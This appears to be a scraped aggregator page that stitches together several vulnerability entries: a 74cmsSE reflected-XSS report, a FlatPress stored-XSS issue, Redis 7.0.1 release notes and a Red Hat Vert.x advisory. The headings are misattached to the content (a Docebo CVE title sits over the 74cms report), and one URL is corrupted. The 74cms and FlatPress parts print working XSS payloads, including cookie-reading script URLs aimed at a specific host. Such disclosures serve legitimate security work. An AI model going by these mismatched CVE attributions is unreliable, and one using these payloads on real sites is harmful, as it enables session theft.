CVE-2022-31361: Security Advisory: Docebo Community Edition <= 4.0.5 - Swascan

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**FlatPress 1.2.1 - Stored XSS in the Blog Content**

A stored Cross Site Scripting (XSS) vulnerability exists in version 1.2.1 of the FlatPress application that allows for arbitrary execution of JavaScript commands.

**Steps to reproduce the vulnerability**

1.  Visit the FlatPress **Administration area**.
2.  Navigate to the **Entries** -> **Write Entry**.
3.  Enter any **Subject**.
4.  In the content area put the following payload:
    *   <script>alert(document.cookie)</script>

5.  Click the **Save&Continue** button.
6.  Stored XSS payload is triggered.

*   Also we can verify the stored XSS payload by navigating to the home page.

Discovered by Martin Kubecka, September 15 2021

Copy link

Member

** **azett** commented Oct 19, 2021**

Hi, thanks for reporting this.  
As legitimated site admin, it is okay to add custom HTML or JS to your page - the described behaviour is intended.  
Does your findings implicate a way to exploit this behaviour _without_ being logged in as site admin?  
Thanks and regards,  
Arvid

2 participants

CVE-2021-41432: Stored XSS in the Blog Content · Issue #88 · flatpressblog/flatpress

Redis v7.0 was discovered to contain a memory leak via the component streamGetEdgeID.

**Conversation**

 

add a comment to \`container\` in \`quicklist.h\`.
Because \`PLAIN\` and \`PACKED\` are not as easy to understand as \`NONE\`
and \`LISTPACK\` and we don't have a detailed comment on it.

Co-authored-by: Oran Agra <oran@redislabs.com>

\`the redis object pointer was populated.\` -> \`the sds pointer was populated.\`
We don't populate the redis object pointer in this function.

Till now, on MacOS we only used to enable SO\_KEEPALIVE,
but we didn't set the interval which is configurable via the \`tcp-keepalive\` config.
This adds support for that on MacOS, to match what we already do on Linux.

update macros ZIPLIST\_ENTRY\_END i think the right definition is ((zl)+intrev32ifbe(ZIPLIST\_BYTES(zl))-ZIPLIST\_END\_SIZE)

 

…#10663)

When user uses the same input key for SDIFF as the first one, the result must be empty, so we don't need to process the elements to test.

This method is like the one done in zset‘s \`zsetChooseDiffAlgorithm\`

Co-authored-by: Oran Agra <oran@redislabs.com>

In general, our error handler make sure the error
object is always a table. In some rare cases (such
as OOM error), the error handler will not be called
and the error object will be a string. The PR expose
the error even if its a string and not a table.

Currently there is no way to test it but if it'll ever happen,
it is better to propagate this string upwards than just
generate a generic error without any specific info.

 

\* Module API doc script: Mark unreleased API functions

\* fix broken quotes in generate-module-api-doc.rb

Co-authored-by: Oran Agra <oran@redislabs.com>

)

this seems to have been an oversight. syncing the flags so that NOTIFY\_NEW is available to modules.
missing in redis#10512

 

also fixing already defined constants build warning while at it.

Co-authored-by: Oran Agra <oran@redislabs.com>

Fixed RM\_Scan() usage example: \`RedisModuleCursor\` -> \`RedisModuleScanCursor\`

…edis#10661)

If we want to support bits that can be overlapping, we need to make sure
that:
1. we don't use the same bit for two return values.
2. values should be sorted so that prefer ones (matching more
   bits) come first.

Unintentional change in redis#9644 (since RC1) meant that an empty \`--save ""\` config
from command line, wouldn't have clear any setting from the config file

Added tests to cover that, and improved test infra to take additional
command line args for redis-server

fix some typo in "t\_zset.c".
1. \`zzlisinlexrange\` the function name mentioned in the comment is misspelled.
2. fix typo in function name\`zarndmemberReplyWithListpack\` -> \`zrandmemberReplyWithListpack\`

Changed cursor's type from \`int\` to \`unsigned long\`
allows handling database or key with more than 2^31 elements

Set \`old\_li\` to NULL to avoid linking it again on error.
Before the fix, loading an already existing library will cause the existing library to be added again. This cause not harm other then wrong statistics. The statistics that are effected  by the issue are:
\* \`libraries\_count\` and \`functions\_count\` returned by \`function stats\` command
\* \`used\_memory\_functions\` returned on \`info memory\` command
\* \`functions.caches\` returned on \`memory stats\` command

…0683)

It used to returns slots as strings, like:
\`\`\`
redis> cluster shards
1) 1) "slots"
   2) 1) "10923"
      2) "16383"
\`\`\`

CLUSTER SHARDS docs and the top comment of redis#10293 says that it returns integers.
Note other commands like CLUSTER SLOTS, it returns slots as integers.
Use addReplyLongLong instead of addReplyBulkLongLong, now it returns slots as integers:
\`\`\`
redis> cluster shards
1) 1) "slots"
   2) 1) (integer) 10923
      2) (integer) 16383
\`\`\`

This is a small breaking change, introduced in 7.0.0 (7.0 RC3, redis#10293)

Fixes redis#10680

I suggest to use "\[fpclassify\](https://en.cppreference.com/w/cpp/numeric/math/fpclassify)" for float
comparison with zero, because of expression "value == 0" with value very close to zero can be
considered as true with some performance compiler optimizations.

Note: this code was introduced by 9d520a7 to accept zset scores that get ERANGE in conversion
due to precision loss near 0.
But with Intel compilers, ICC and ICX, where optimizations for 0 check are more aggressive, "==0" is
true for mentioned functions, however should not be. Behavior is seen starting from O2.
This leads to a failure in the ZSCAN test in scan.tcl

Fix redis#10552

We no longer piggyback getkeys\_proc to hold the RedisModuleCommand struct, when exists

Others:
Use \`doesCommandHaveKeys\` in \`RM\_GetCommandKeysWithFlags\` and \`getKeysSubcommandImpl\`.
It causes a very minor behavioral change in commands that don't have actual keys, but have a spec
with \`CMD\_KEY\_NOT\_KEY\`.
For example, before this command \`COMMAND GETKEYS SPUBLISH\` would return
\`Invalid arguments specified for command\` but not it returns \`The command has no key arguments\`

…t dirty counter to 0 if we enable save (redis#10691)

## FLUSHALL
We used to restore the dirty counter after \`rdbSave\` zeroed it if we enable save.
Otherwise FLUSHALL will not be replicated nor put into the AOF.

And then we do increment it again below.
Without that extra dirty++, when db was already empty, FLUSHALL
will not be replicated nor put into the AOF.

We now gonna replace all that dirty counter magic with a call
to forceCommandPropagation (REPL and AOF), instead of all the
messing around with the dirty counter.
Added tests to cover three part (dirty counter, REPL, AOF).

One benefit other than cleaner code is that the \`rdb\_changes\_since\_last\_save\` is correct in this case.

## FLUSHDB
FLUSHDB was not replicated nor put into the AOF when db was already empty.
Unlike DEL on a non-existing key, FLUSHDB always does something, and that's to call the module hook. 
So basically FLUSHDB is never a NOP, and thus it should always be propagated.
Not doing that, could mean that if a module does something in that hook, and wants to
avoid issues of that hook being missing on the replica if the db is empty, it'll need to do complicated things.

So now FLUSHDB add call forceCommandPropagation, we will always propagate FLUSHDB.
Always propagating FLUSHDB seems like a safe approach that shouldn't have any drawbacks (other than looking odd)

This was mentioned in redis#8972

## Test section:
We actually found it while solving a race condition in the BGSAVE test (other.tcl).
It was found in extra\_ci Daily Arm64 (test-libc-malloc).
\`\`\`
\[exception\]: Executing test client: ERR Background save already in progress.
ERR Background save already in progress
\`\`\`

It look like \`r flushdb\` trigger (schedule) a bgsave right after \`waitForBgsave r\` and before \`r save\`.
Changing flushdb to flushall, FLUSHALL will do a foreground save and then set the dirty counter to 0.

… spaces for MULTI\_ARG configs parsing. And allow options value to use the -- prefix (redis#10660)

## Take one bulk string with spaces for MULTI\_ARG configs parsing
Currently redis-server looks for arguments that start with \`--\`,
and anything in between them is considered arguments for the config.
like: \`src/redis-server --shutdown-on-sigint nosave force now --port 6380\`

MULTI\_ARG configs behave differently for CONFIG command, vs the command
line argument for redis-server.
i.e. CONFIG command takes one bulk string with spaces in it, while the
command line takes an argv array with multiple values.

In this PR, in config.c, if \`argc > 1\` we can take them as is,
and if the config is a \`MULTI\_ARG\` and \`argc == 1\`, we will split it by spaces.

So both of these will be the same:
\`\`\`
redis-server --shutdown-on-sigint nosave force now --shutdown-on-sigterm nosave force
redis-server --shutdown-on-sigint nosave "force now" --shutdown-on-sigterm nosave force
redis-server --shutdown-on-sigint nosave "force now" --shutdown-on-sigterm "nosave force"
\`\`\`

## Allow options value to use the \`--\` prefix
Currently it decides to switch to the next config, as soon as it sees \`--\`, 
even if there was not a single value provided yet to the last config,
this makes it impossible to define a config value that has \`--\` prefix in it.

For instance, if we want to set the logfile to \`--my--log--file\`,
like \`redis-server --logfile --my--log--file --loglevel verbose\`,
current code will handle that incorrectly.

In this PR, now we allow a config value that has \`--\` prefix in it.
\*\*But note that\*\* something like \`redis-server --some-config --config-value1 --config-value2 --loglevel debug\`
would not work, because if you want to pass a value to a config starting with \`--\`, it can only be a single value.
like: \`redis-server --some-config "--config-value1 --config-value2" --loglevel debug\`

An example (using \`--\` prefix config value):
\`\`\`
redis-server --logfile --my--log--file --loglevel verbose
redis-cli config get logfile loglevel
1) "loglevel"
2) "verbose"
3) "logfile"
4) "--my--log--file"
\`\`\`

### Potentially breaking change
\`redis-server --save --loglevel verbose\` used to work the same as \`redis-server --save "" --loglevel verbose\`
now, it'll error!

Before this commit, all source files including those that are not going
to be compiled were used. Some of these files are platform specific and
won't even pre-process on another platform. With GCC/Clang, that's not
an issue and they'll simply ignore them, but ICC aborts in this case.

This commit only attempts to generate Makefile.dep from the actual set
of C source files that will be compiled.

…G flag for volatile configurations. (redis#10713)

This fixes a possible regression in Redis 7.0.0, in which doing CONFIG SET
on a TLS config would not reload the configuration in case the new config is
the same file as before.

A volatile configuration is a configuration value which is a reference to the
configuration data and not the configuration data itself. In such a case Redis
doesn't know if the config data changed under the hood and can't assume a
change happens only when the config value changes. Therefore it needs to
be applied even when setting a config value to the same value as it was before.

The purpose of the test is to kill the child while it is running.
From the last two lines we can see the child exits before being killed.
\`\`\`
- Module fork started pid: 56998
\* <fork> fork child started
- Killing running module fork child: 56998
\* <fork> fork child exiting
signal-handler (1652267501) Received SIGUSR1 in child, exiting now.
\`\`\`

In this commit, we pass an argument to \`fork.create\` indicating how
long it should sleep. For the fork kill test, we use a longer time to
avoid the child exiting before being killed.

Other changes:
use wait\_for\_condition instead of hardcoded \`after 250\`.
Unify the test for failing fork with the one for killing it (save time)

…10645)

Updated the comments for:
info command
lmpopCommand and blmpopCommand
sinterGenericCommand 

Fix the missing "key" words in the srandmemberCommand function
For LPOS command, when rank is 0, prompt user that rank could be
positive number or negative number, and add a test for it

Alias was mistakenly forgotten when the sub commands introduced as json files.

since the sharded pubsub is different with pubsub, it's better to give users a hint to make it more clear.

This allows the module to know the usable size of an allocation
it made, rather than the consumed size.

…truct (redis#10697)

Move the client flags to a more cache friendly position within the client struct
we regain the lost 2% of CPU cycles since v6.2 ( from 630532.57 to 647449.80 ops/sec ).
These are due to higher rate of calls to getClientType due to changes in redis#9166 and redis#10020

…M check bug, and new RM\_Call checks. (redis#10786)

\* Fix broken protocol when redis can't persist to RDB (general commands, not
  modules), excessive newline. regression of redis#10372 (7.0 RC3)
\* Fix broken protocol when Redis can't persist to AOF (modules and
  scripts), missing newline.
\* Fix bug in OOM check of EVAL scripts called from RM\_Call.
  set the cached OOM state for scripts before executing module commands too,
  so that it can serve scripts that are executed by modules.
  i.e. in the past EVAL executed by RM\_Call could have either falsely
  fail or falsely succeeded because of a wrong cached OOM state flag.
\* Fix bugs with RM\_Yield:
  1. SHUTDOWN should only accept the NOSAVE mode
  2. Avoid eviction during yield command processing.
  3. Avoid processing master client commands while yielding from another client
\* Add new two more checks to RM\_Call script mode.
  1. READONLY You can't write against a read only replica
  2. MASTERDOWN Link with MASTER is down and \`replica-serve-stale-data\` is set to \`no\`
\* Add new RM\_Call flag to let redis automatically refuse \`deny-oom\` commands
  while over the memory limit. 
\* Add tests to cover various errors from Scripts, Modules, Modules
  calling scripts, and Modules calling commands in script mode.

Add tests:
\* Looks like the MISCONF error was completely uncovered by the tests,
  add tests for it, including from scripts, and modules
\* Add tests for NOREPLICAS from scripts
\* Add tests for the various errors in module RM\_Call, including RM\_Call that
  calls EVAL, and RM\_call in "eval mode". that includes:
  NOREPLICAS, READONLY, MASTERDOWN, MISCONF

The important part is that read-only scripts (not just EVAL\_RO
and FCALL\_RO, but also ones with \`no-writes\` executed by normal EVAL or
FCALL), will now be permitted to run during CLIENT PAUSE WRITE (unlike
before where only the \_RO commands would be processed).

Other than that, some errors like OOM, READONLY, MASTERDOWN are now
handled by processCommand, rather than the command itself affects the
error string (and even error code in some cases), and command stats.

Besides that, now the \`may-replicate\` commands, PFCOUNT and PUBLISH, will
be considered \`write\` commands in scripts and will be blocked in all
read-only scripts just like other write commands.
They'll also be blocked in EVAL\_RO (i.e. even for scripts without the
\`no-writes\` shebang flag.

This commit also hides the \`may\_replicate\` flag from the COMMAND command
output. this is a \*\*breaking change\*\*.

background about may\_replicate:
We don't want to expose a no-may-replicate flag or alike to scripts, since we
consider the may-replicate thing an internal concern of redis, that we may
some day get rid of.
In fact, the may-replicate flag was initially introduced to flag EVAL: since
we didn't know what it's gonna do ahead of execution, before function-flags
existed). PUBLISH and PFCOUNT, both of which because they have side effects
which may some day be fixed differently.

code changes:
The changes in eval.c are mostly code re-ordering:
- evalCalcFunctionName is extracted out of evalGenericCommand
- evalExtractShebangFlags is extracted luaCreateFunction
- evalGetCommandFlags is new code

Apparently, GCC 11.2.0 has a new fancy warning for misleading indentations.
It prints a warning when BRET(b) is on the same line as the loop.

 

…, and inserting comments around module and acl configs (redis#10761)

A regression from redis#10285 (redis 7.0).
CONFIG REWRITE would put lines with: \`include\`, \`rename-command\`,
\`user\`,  \`loadmodule\`, and any module specific config in a comment.

For ACL \`user\`, \`loadmodule\` and module specific configs would be
re-inserted at the end (instead of updating existing lines), so the only
implication is a messy config file full of comments.

But for \`rename-command\` and \`include\`, the implication would be that
they're now missing, so a server restart would lose them.

Co-authored-by: Oran Agra <oran@redislabs.com>

Skip the print on AOF\_NOT\_EXIST status.

 

Redis 7 adds some new alias config like \`hash-max-listpack-entries\` alias \`hash-max-ziplist-entries\`.

If a config file contains both real name and alias like this:
\`\`\`
hash-max-listpack-entries 20
hash-max-ziplist-entries 20
\`\`\`

after set \`hash-max-listpack-entries\` to 100 and \`config rewrite\`, the config file becomes to:
\`\`\`
hash-max-listpack-entries 100
hash-max-ziplist-entries 20
\`\`\`

we can see that the alias config is not modified, and users will get wrong config after restart.

6.0 and 6.2 doesn't have this bug, since they only have the \`slave\` word alias.

Co-authored-by: Oran Agra <oran@redislabs.com>

\* Update time independent string compare to use hash length

On line 4068, redis has a logical nodeIsSlave(myself) on the outer if layer,
which you can delete without having to repeat the decision

…and instantaneous\_output\_repl\_kbps. (redis#10810)

A supplement to redis#10062
Split \`instantaneous\_repl\_total\_kbps\` to \`instantaneous\_input\_repl\_kbps\` and \`instantaneous\_output\_repl\_kbps\`. 
## Work:
This PR:
- delete 1 info field:
    - \`instantaneous\_repl\_total\_kbps\`
- add 2 info fields:
    - \`instantaneous\_input\_repl\_kbps / instantaneous\_output\_repl\_kbps\`
## Result:
- master
\`\`\`
total\_net\_input\_bytes:26633673
total\_net\_output\_bytes:21716596
total\_net\_repl\_input\_bytes:0
total\_net\_repl\_output\_bytes:18433052
instantaneous\_input\_kbps:0.02
instantaneous\_output\_kbps:0.00
instantaneous\_input\_repl\_kbps:0.00
instantaneous\_output\_repl\_kbps:0.00
\`\`\`
- slave
\`\`\`
total\_net\_input\_bytes:18433212
total\_net\_output\_bytes:94790
total\_net\_repl\_input\_bytes:18433052
total\_net\_repl\_output\_bytes:0
instantaneous\_input\_kbps:0.00
instantaneous\_output\_kbps:0.05
instantaneous\_input\_repl\_kbps:0.00
instantaneous\_output\_repl\_kbps:0.00
\`\`\`

Trying to avoid people opening crash report issues about module crashes and ARM QEMU bugs.

Current documentation only states a single GET token is needed which is not true. Marking the command with multiple\_token.

Currently generate-command.help.rb dose not handle the
multiple\_token flag, handle this flag in this PR.
The format is the same as redis-cli rendering.
\`\`\`diff
- bitfield\_ro key GET encoding offset \[encoding offset ...\]
+ bitfield\_ro key GET encoding offset \[GET encoding offset ...\]
\`\`\`

Re run generate-command-code.py which was forget in redis#10820.
Also change the flag value from string to bool, like "true" to true

Correcting the introduction version of the command \`BITFIELD\_RO\`
Command added by commit: b3e4abf 

Add history info of the \`FULL\` modifier in \`XINFO STREAM\`
Modifier was added by commit: 1e2aee3

(Includes output from \`./utils/generate-command-code.py\`)

Currently, we only increment stat\_rdb\_saves in rdbSaveBackground,
we should also increment it in the SAVE command.

We concluded there's no need to increment when:
1. saving a base file for an AOF
2. when saving an empty rdb file to delete an old one
3. when saving to sockets (not creating a persistence / snapshot file)

The stat counter was introduced in redis#10178

\* fix a wrong comment in startSaving

This change fixes failing \`integration/logging.tcl\` test in Gentoo with
musl libc, where \`ldd\` returns
\`\`\`
libc.so => /lib/ld-musl-x86\_64.so.1 (0x7f9d5f171000)
\`\`\`
unlike Alpine's
\`\`\`
libc.musl-x86\_64.so.1 => /lib/ld-musl-x86\_64.so.1 (0x7f82cfa16000)
\`\`\`
The solution is to extend matching pattern introduced in redis#8532.

 oranagra changed the base branch from unstable to 7.0

Jun 8, 2022

CVE-2022-33105: Release 7.0.1 by oranagra · Pull Request #10829 · redis/redis

Red Hat Security Advisory 2022-5029-01 - This release of Red Hat build of Eclipse Vert.x 4.2.7 GA includes security updates. Issues addressed include denial of service and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat build of Eclipse Vert.x 4.2.7 security update  
Advisory ID:       RHSA-2022:5029-01  
Product:           Red Hat OpenShift Application Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5029  
Issue date:        2022-06-23  
CVE Names:         CVE-2020-36518 CVE-2022-25647  
====================================================================  
1. Summary:

An update is now available for Red Hat build of Eclipse Vert.x.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability. For  
more information, see the CVE pages listed in the References section.

2. Description:

This release of Red Hat build of Eclipse Vert.x 4.2.7 GA includes security  
updates. For more information, see the release notes listed in the  
References section.

Security Fix(es):

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* com.google.code.gson-gson: Deserialization of Untrusted Data in  
com.google.code.gson-gson (CVE-2022-25647)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgements, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link for the  
update. You must be logged in to download the update.

4. Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2080850 - CVE-2022-25647 com.google.code.gson-gson: Deserialization of Untrusted Data in com.google.code.gson-gson

5. References:

https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2022-25647  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&productÊtRhoar.eclipse.vertx&version=4.2.7  
https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.2/html/release_notes_for_eclipse_vert.x_4.2/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrRWD9zjgjWX9erEAQhySBAAlXKnG1+57IQ9cKGQWzpLWKFWJVqsyrGb  
hI/qVXa3T2DnslKYD061oBjY6FEBYwVqOrZLkv+9bSuW5CqdworRqzW+ozpPUJw4  
1IKqO//OXQ/2UAB9FSKjhcyIB/d6af3urm47rtbeplt8WBF3fh4+Zo+sVxpTRbhX  
Kmy+z7YIEKkstR5AQR05mt9KHjpKkj4p2xMwtz3p+VJ0sff0O6gSMdA3oPKoSbms  
b43OhcBeiO5eqXryTgtIauRC2tzOk1lGryfDoWI24x4RFPhgK9r67Vv8r6j6psFi  
6mBcJvzCpynJSnVOR75KQl9E3t7yuIJR14M6p+PndlcrncMg7S7nlhVvRgdun+Dj  
JuL5Kd8QDqu/UQiqLYCpCoZUkyDpg3ztVgR84Y0AFWMH7Q4o+K/dlWBwE1ejrxx0  
klurqysi86Ra0UKwk5zzfvNi/r/Cm/7xdMliNrx8pozuZiFK4nW4y9a6Uvu7AH8v  
nA4cC5zeM9DWFntZiCn3bfigSRcTdZlfhnvk6Csgzu/HhYR9p2QGnY76ZSgaVq45  
ptqT37TDFHFhJSKhR7GLxwrVogT5HjrHV3OMpH2P7p/pO7MkKJovDY+YG5xk1TB8  
gdBYMYiSGhlIRrdIeoLGIkqcOs0cEP86+UO1yeYjvIssG6dArotiSJt3LTN/mLzf  
LEg430ARk3s=qurb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js